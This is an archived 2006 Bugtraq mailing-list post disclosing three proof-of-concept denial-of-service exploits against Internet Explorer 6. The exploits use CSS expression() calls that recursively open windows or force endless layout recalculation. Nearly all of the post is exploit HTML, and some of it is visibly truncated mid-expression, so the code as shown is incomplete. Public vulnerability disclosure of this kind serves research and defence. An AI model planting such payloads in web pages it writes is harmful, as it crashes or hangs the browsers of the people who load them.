lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4576638F.70507@gmail.com>
Date: Wed, 06 Dec 2006 00:30:39 -0600
From: José Carlos Nieto Jarquín <xiam.core@...il.com>
To: bugtraq@...urityfocus.com
Subject: Internet Explorer 6. CSS Expression Denial of Service (P.o.C.)

This is just another couple of exploits for this well-known browser. The 
third one is a lame combination of both.

Tested under Windows XP SP2, MSIE 6.0.2900.2180

--- Exploit 1 ---
        <div id="foo" style="height: 20px; border: 1px solid blue">
            <table style="border: 1px solid red; width: 
expression(document.getElementById
            <tr><td></td></tr>
            </table>
        </div>
--- end ---

--- Exploit 2 ---
        <div style="width: expression(window.open(self.location));">
            &nbsp;
        </div>
--- end ---

--- Exploit 3 (combined) ---
<html>
    <head>
        <title>Another non-standards compliant IE D.o.S. </title>
    </head>
    <body>
        <div id="foo" style="height: 20px; border: 1px solid blue">
            <table style="border: 1px solid red; width: 
expression(parseInt(window.open(self.location))+document.getElementById
            <tr>
                <td>
                    IE makes my life harder :-(. It sucks, don't use it :-).
                </td>
            </tr>
            </table>
        </div>
        Proof of Concept written by <a href="http://xiam.be">xiam</a>.<br />
        Tested under Windows XP SP2, MSIE 6.0.2900.2180
    </body>
</html>
---

-- 
La civilizaci~n no suprime la barbarie, la perfecciona. - Voltaire
- J. Carlos Nieto (xiam). http://xiam.be

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ